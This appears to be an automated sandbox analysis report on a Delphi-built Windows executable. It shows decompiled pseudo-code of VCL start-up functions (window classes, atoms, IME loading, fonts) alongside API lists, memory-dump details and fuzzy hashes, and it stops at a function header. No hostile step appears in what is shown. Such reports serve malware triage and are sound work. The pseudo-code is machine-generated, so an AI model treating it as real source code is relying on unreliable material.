                                                                        
                                                                        				_v48 = 0;
                                                                        				_t68 = __eax;
                                                                        				_push(_t82);
                                                                        				_push(0x4554fb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t82 + 0xffffffd4;
                                                                        				if( *((char*)(__eax + 0xa4)) != 0) {
                                                                        					L13:
                                                                        					_pop(_t76);
                                                                        					 *[fs:eax] = _t76;
                                                                        					_push(0x455502);
                                                                        					return E00404348( &_v48);
                                                                        				}
                                                                        				_t22 =  *0x495b34; // 0x496048
                                                                        				if( *_t22 != 0) {
                                                                        					goto L13;
                                                                        				}
                                                                        				_t23 = E0041D260(E00455880, __eax); // executed
                                                                        				 *(_t68 + 0x40) = _t23;
                                                                        				_t25 =  *0x47ac08; // 0x45504c
                                                                        				_t26 =  *0x496714; // 0x400000
                                                                        				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
                                                                        					_t61 =  *0x496714; // 0x400000
                                                                        					 *0x47abf4 = _t61;
                                                                        					_t87 = RegisterClassA(0x47abe4);
                                                                        					if(_t87 == 0) {
                                                                        						_t63 =  *0x4958e4; // 0x41d574
                                                                        						E00406548(_t63,  &_v48);
                                                                        						E0040A17C(_v48, 1);
                                                                        						E00403DA8();
                                                                        					}
                                                                        				}
                                                                        				_t28 =  *0x495998; // 0x496a9c
                                                                        				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
                                                                        				if(_t87 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				_t32 =  *0x495998; // 0x496a9c
                                                                        				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
                                                                        				if(_t87 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				_push(_t35);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_t36 =  *0x496714; // 0x400000
                                                                        				_push(_t36);
                                                                        				_push(0);
                                                                        				_t7 = _t68 + 0x8c; // 0x29c80044
                                                                        				_t38 = E004047F8( *_t7);
                                                                        				_t39 =  *0x47ac08; // 0x45504c, executed
                                                                        				_t40 = E00407340(_t39, 0x84ca0000, _t38); // executed
                                                                        				 *(_t68 + 0x30) = _t40;
                                                                        				_t9 = _t68 + 0x8c; // 0x44d55c
                                                                        				E00404348(_t9);
                                                                        				 *((char*)(_t68 + 0xa4)) = 1;
                                                                        				_t11 = _t68 + 0x40; // 0x10ac0000
                                                                        				_t12 = _t68 + 0x30; // 0xe
                                                                        				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                        				_t46 =  *0x495a04; // 0x496b70
                                                                        				if( *_t46 != 0) {
                                                                        					_t54 = E00455F58(_t68);
                                                                        					_t13 = _t68 + 0x30; // 0xe
                                                                        					SendMessageA( *_t13, 0x80, 1, _t54); // executed
                                                                        					_t58 = E00455F58(_t68);
                                                                        					_t14 = _t68 + 0x30; // 0xe
                                                                        					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
                                                                        				}
                                                                        				_t15 = _t68 + 0x30; // 0xe
                                                                        				_t69 = GetSystemMenu( *_t15, "true");
                                                                        				DeleteMenu(_t69, 0xf030, 0);
                                                                        				DeleteMenu(_t69, 0xf000, 0);
                                                                        				_t51 =  *0x495a04; // 0x496b70
                                                                        				if( *_t51 != 0) {
                                                                        					DeleteMenu(_t69, 0xf010, 0);
                                                                        				}
                                                                        				goto L13;
                                                                        			}





























                                                                        APIs
                                                                          • Part of subcall function 0041D260: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        • GetClassInfoA.USER32 ref: 004553B9
                                                                        • RegisterClassA.USER32 ref: 004553D1
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        • SetWindowLongA.USER32 ref: 0045546D
                                                                        • SendMessageA.USER32 ref: 0045548F
                                                                        • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554A2
                                                                        • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554AD
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554BC
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554C9
                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                        • String ID: H`I$LPE$pkI
                                                                        • API String ID: 2103932818-880299876
                                                                        • Opcode ID: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction ID: dba36a22936c401213b48a9bdafbdde789661dbc4a9e7479afdc9c550058aeec
                                                                        • Opcode Fuzzy Hash: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction Fuzzy Hash: A2418E707446406FE711EBA9DC92F6A33A8AB45305F154476FE04EF2E3DA78A844872D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E004418D8(void* __ebx, void* __edi, void* __eflags) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				long _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t25;
                                                                        				char _t29;
                                                                        				intOrPtr _t35;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr* _t50;
                                                                        				intOrPtr _t53;
                                                                        				struct HINSTANCE__* _t63;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t80;
                                                                        				intOrPtr _t83;
                                                                        				void* _t87;
                                                                        
                                                                        				_v20 = 0;
                                                                        				_v8 = 0;
                                                                        				_push(_t87);
                                                                        				_push(0x441a50);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                        				_v16 = GetCurrentProcessId();
                                                                        				_v12 = 0;
                                                                        				E0040936C("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                        				E0040439C(0x496b7c, _v8);
                                                                        				_t25 =  *0x496b7c; // 0x21708a8
                                                                        				 *0x496b78 = GlobalAddAtomA(E004047F8(_t25));
                                                                        				_t29 =  *0x496714; // 0x400000
                                                                        				_v36 = _t29;
                                                                        				_v32 = 0;
                                                                        				_v28 = GetCurrentThreadId();
                                                                        				_v24 = 0;
                                                                        				E0040936C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                        				E0040439C(0x496b80, _v20);
                                                                        				_t35 =  *0x496b80; // 0x21708c4
                                                                        				 *0x496b7a = GlobalAddAtomA(E004047F8(_t35));
                                                                        				_t38 =  *0x496b80; // 0x21708c4
                                                                        				 *0x496b84 = RegisterClipboardFormatA(E004047F8(_t38));
                                                                        				 *0x496bbc = E00414744(1);
                                                                        				E004414DC();
                                                                        				 *0x496b6c = E00441304(1, 1);
                                                                        				_t47 = E00453F78(1, __edi);
                                                                        				_t78 =  *0x495c2c; // 0x496c08
                                                                        				 *_t78 = _t47;
                                                                        				_t49 = E0045505C(0, 1);
                                                                        				_t80 =  *0x495ad0; // 0x496c04
                                                                        				 *_t80 = _t49;
                                                                        				_t50 =  *0x495ad0; // 0x496c04
                                                                        				E00456B68( *_t50, 1);
                                                                        				_t53 =  *0x430eb0; // 0x430eb4
                                                                        				E004139C4(_t53, 0x4336c0, 0x4336d0);
                                                                        				_t63 = GetModuleHandleA("USER32");
                                                                        				if(_t63 != 0) {
                                                                        					 *0x47a8a8 = GetProcAddress(_t63, "AnimateWindow");
                                                                        				}
                                                                        				_pop(_t83);
                                                                        				 *[fs:eax] = _t83;
                                                                        				_push(0x441a57);
                                                                        				E00404348( &_v20);
                                                                        				return E00404348( &_v8);
                                                                        			}

























                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                        • RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 00414744: RtlInitializeCriticalSection.KERNEL32(00411A90,?,?,004419A9,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00414763
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                          • Part of subcall function 004414DC: GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                          • Part of subcall function 004414DC: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                          • Part of subcall function 00453F78: GetKeyboardLayout.USER32 ref: 00453FBD
                                                                          • Part of subcall function 00453F78: GetDC.USER32(00000000), ref: 00454012
                                                                          • Part of subcall function 00453F78: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045401C
                                                                          • Part of subcall function 00453F78: ReleaseDC.USER32 ref: 00454027
                                                                          • Part of subcall function 0045505C: LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                          • Part of subcall function 0045505C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                          • Part of subcall function 0045505C: OemToCharA.USER32(?,?), ref: 00455186
                                                                          • Part of subcall function 0045505C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                        • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                        • API String ID: 2984857458-1126952177
                                                                        • Opcode ID: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction ID: 0033b563d108e4a526ad8c315f1ec0427d91b7655410c97774380eaa5b0c3b7d
                                                                        • Opcode Fuzzy Hash: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction Fuzzy Hash: 88415FB4A002459FCB00FFB5D88269D77F5EB99308B12543BE405E77A2EB39A9008B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E0045505C(void* __ecx, char __edx) {
                                                                        				char _v5;
                                                                        				char _v261;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t43;
                                                                        				struct HINSTANCE__** _t53;
                                                                        				struct HICON__* _t55;
                                                                        				intOrPtr _t58;
                                                                        				struct HINSTANCE__** _t60;
                                                                        				void* _t67;
                                                                        				char* _t69;
                                                                        				char* _t75;
                                                                        				intOrPtr _t81;
                                                                        				intOrPtr* _t88;
                                                                        				intOrPtr* _t89;
                                                                        				intOrPtr _t90;
                                                                        				void* _t91;
                                                                        				char _t93;
                                                                        				void* _t104;
                                                                        				void* _t105;
                                                                        
                                                                        				_t93 = __edx;
                                                                        				_t91 = __ecx;
                                                                        				if(__edx != 0) {
                                                                        					_t105 = _t105 + 0xfffffff0;
                                                                        					_t39 = E00403940(_t39, _t104);
                                                                        				}
                                                                        				_v5 = _t93;
                                                                        				_t90 = _t39;
                                                                        				E0041C1DC(_t91, 0);
                                                                        				_t42 =  *0x495a48; // 0x47a468
                                                                        				if( *((short*)(_t42 + 2)) == 0) {
                                                                        					_t89 =  *0x495a48; // 0x47a468
                                                                        					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                        					 *_t89 = 0x456690;
                                                                        				}
                                                                        				_t43 =  *0x495aec; // 0x47a470
                                                                        				_t109 =  *((short*)(_t43 + 2));
                                                                        				if( *((short*)(_t43 + 2)) == 0) {
                                                                        					_t88 =  *0x495aec; // 0x47a470
                                                                        					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                        					 *_t88 = E00456888;
                                                                        				}
                                                                        				 *((char*)(_t90 + 0x34)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
                                                                        				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                        				 *((char*)(_t90 + 0x7c)) = 1;
                                                                        				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                        				 *((char*)(_t90 + 0x88)) = 0;
                                                                        				 *((char*)(_t90 + 0x9d)) = 1;
                                                                        				 *((char*)(_t90 + 0xb4)) = 1;
                                                                        				_t103 = E00425C8C(1);
                                                                        				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                        				_t53 =  *0x49597c; // 0x49602c
                                                                        				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                        				E0042605C(_t103, _t55);
                                                                        				_t20 = _t90 + 0x98; // 0x736d
                                                                        				_t58 =  *_t20;
                                                                        				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0x456df8;
                                                                        				_t60 =  *0x49597c; // 0x49602c
                                                                        				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                        				OemToCharA( &_v261,  &_v261);
                                                                        				_t67 = E0040ACE8(0x5c, _t109);
                                                                        				_t110 = _t67;
                                                                        				if(_t67 != 0) {
                                                                        					_t27 = _t67 + 1; // 0x1
                                                                        					E00408C34( &_v261, _t27);
                                                                        				}
                                                                        				_t69 = E0040AD10( &_v261, 0x2e, _t110);
                                                                        				if(_t69 != 0) {
                                                                        					 *_t69 = 0;
                                                                        				}
                                                                        				CharLowerA( &(( &_v261)[1]));
                                                                        				_t31 = _t90 + 0x8c; // 0x44d55c
                                                                        				E004045B0(_t31, 0x100,  &_v261);
                                                                        				_t75 =  *0x495874; // 0x496034
                                                                        				if( *_t75 == 0) {
                                                                        					E00455364(_t90, _t90, 0x100); // executed
                                                                        				}
                                                                        				 *((char*)(_t90 + 0x59)) = 1;
                                                                        				 *((char*)(_t90 + 0x5a)) = 1;
                                                                        				 *((char*)(_t90 + 0x5b)) = 1;
                                                                        				 *((char*)(_t90 + 0x9e)) = 1;
                                                                        				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                        				E00456FD4(_t90, 0x100);
                                                                        				E00457914(_t90);
                                                                        				_t81 = _t90;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t81);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t90;
                                                                        			}

























                                                                        0x004551a5
                                                                        0x004551b2
                                                                        0x004551b9
                                                                        0x004551bb
                                                                        0x004551bb
                                                                        0x004551c6
                                                                        0x004551cb
                                                                        0x004551dc
                                                                        0x004551e1
                                                                        0x004551e9
                                                                        0x004551ed
                                                                        0x004551ed
                                                                        0x004551f2
                                                                        0x004551f6
                                                                        0x004551fa
                                                                        0x004551fe
                                                                        0x00455207
                                                                        0x0045520f
                                                                        0x00455216
                                                                        0x0045521b
                                                                        0x00455221
                                                                        0x00455223
                                                                        0x00455228
                                                                        0x0045522f
                                                                        0x00455239

                                                                        APIs
                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                        • OemToCharA.USER32(?,?), ref: 00455186
                                                                        • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                        • String ID: ,`I$4`I$MAINICON
                                                                        • API String ID: 3935243913-2513232985
                                                                        • Opcode ID: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction ID: 7165f6ef90a4096c26261ca2b15fb1af64d1f8c3d9a5e3545fba0b08bd0ef4cb
                                                                        • Opcode Fuzzy Hash: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction Fuzzy Hash: 59515F706046449FDB41DF29C8C5B867BE4AB15308F4481BAEC48CF397D7BAD9888B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00401AA0() {
                                                                        				void* _t11;
                                                                        				signed int _t13;
                                                                        				intOrPtr _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr _t23;
                                                                        
                                                                        				_push(_t23);
                                                                        				_push(E00401B56);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t23;
                                                                        				_push(0x4965c4);
                                                                        				L004013F4();
                                                                        				if( *0x496049 != 0) {
                                                                        					_push(0x4965c4);
                                                                        					L004013FC();
                                                                        				}
                                                                        				E00401464(0x4965e4);
                                                                        				E00401464(0x4965f4);
                                                                        				E00401464(0x496620);
                                                                        				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                        				 *0x49661c = _t11;
                                                                        				if( *0x49661c != 0) {
                                                                        					_t13 = 3;
                                                                        					do {
                                                                        						_t20 =  *0x49661c; // 0x7e2258
                                                                        						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                        						_t13 = _t13 + 1;
                                                                        					} while (_t13 != 0x401);
                                                                        					 *((intOrPtr*)(0x496608)) = 0x496604;
                                                                        					 *0x496604 = 0x496604;
                                                                        					 *0x496610 = 0x496604;
                                                                        					 *0x4965bc = 1;
                                                                        				}
                                                                        				_pop(_t19);
                                                                        				 *[fs:eax] = _t19;
                                                                        				_push(E00401B5D);
                                                                        				if( *0x496049 != 0) {
                                                                        					_push(0x4965c4);
                                                                        					L00401404();
                                                                        					return 0;
                                                                        				}
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                        • RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                        • String ID: X"~$l8~$|8~
                                                                        • API String ID: 730355536-2538315497
                                                                        • Opcode ID: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction ID: e3fa4044cabce3705ee1953a6e939e98ba2ac419389a6aed450bfef70ff098bf
                                                                        • Opcode Fuzzy Hash: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction Fuzzy Hash: 440180B0644240AEEB26AB6AA806B197FE5D755718F07803FE000A66F2DBBD5C45CF1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00454754(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                        				char _v5;
                                                                        				struct tagLOGFONTA _v65;
                                                                        				struct tagLOGFONTA _v185;
                                                                        				struct tagLOGFONTA _v245;
                                                                        				void _v405;
                                                                        				void* _t23;
                                                                        				int _t27;
                                                                        				void* _t30;
                                                                        				intOrPtr _t38;
                                                                        				struct HFONT__* _t41;
                                                                        				struct HFONT__* _t45;
                                                                        				struct HFONT__* _t49;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t54;
                                                                        				void* _t57;
                                                                        				void* _t72;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t72 = __edi;
                                                                        				_t74 = _t75;
                                                                        				_t76 = _t75 + 0xfffffe6c;
                                                                        				_t57 = __eax;
                                                                        				_v5 = 0;
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t54 =  *0x496c04; // 0x2170d40
                                                                        					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                                        				}
                                                                        				_push(_t74);
                                                                        				_push(0x454899);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t52 =  *0x496c04; // 0x2170d40
                                                                        					E00456B68(_t52, 0);
                                                                        				}
                                                                        				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                        					_t23 = GetStockObject(0xd);
                                                                        					_t7 = _t57 + 0x84; // 0x38004010
                                                                        					E0041F620( *_t7, _t23, _t72);
                                                                        				} else {
                                                                        					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                        					_t6 = _t57 + 0x84; // 0x38004010
                                                                        					E0041F620( *_t6, _t49, _t72);
                                                                        				}
                                                                        				_v405 = 0x154;
                                                                        				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                                        				if(_t27 == 0) {
                                                                        					_t14 = _t57 + 0x80; // 0xac000000
                                                                        					E0041F704( *_t14, 8);
                                                                        					_t30 = GetStockObject(0xd);
                                                                        					_t15 = _t57 + 0x88; // 0x90000000
                                                                        					E0041F620( *_t15, _t30, _t72);
                                                                        				} else {
                                                                        					_t41 = CreateFontIndirectA( &_v185);
                                                                        					_t11 = _t57 + 0x80; // 0xac000000
                                                                        					E0041F620( *_t11, _t41, _t72);
                                                                        					_t45 = CreateFontIndirectA( &_v245);
                                                                        					_t13 = _t57 + 0x88; // 0x90000000
                                                                        					E0041F620( *_t13, _t45, _t72);
                                                                        				}
                                                                        				_t16 = _t57 + 0x80; // 0xac000000
                                                                        				E0041F464( *_t16, 0x80000017);
                                                                        				_t17 = _t57 + 0x88; // 0x90000000
                                                                        				E0041F464( *_t17, 0x80000007);
                                                                        				 *[fs:eax] = 0x80000007;
                                                                        				_push(0x4548a0);
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t38 =  *0x496c04; // 0x2170d40
                                                                        					return E00456B68(_t38, _v5);
                                                                        				}
                                                                        				return 0;
                                                                        			}























                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004547A8
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004547B5
                                                                        • GetStockObject.GDI32(0000000D), ref: 004547CB
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004547F4
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00454804
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0045481D
                                                                        • GetStockObject.GDI32(0000000D), ref: 00454843
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                        • String ID:
                                                                        • API String ID: 2891467149-0
                                                                        • Opcode ID: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction ID: 54e94ae64045f866c9d0fd814db0631e9b26727ee0c17caded26134f85bec22f
                                                                        • Opcode Fuzzy Hash: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction Fuzzy Hash: A7316A30604244ABDB50FBA5DC42B9633E5AB44308F5580B7BD4CDF2A7DE78994EC729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00453F78(char __edx, void* __edi) {
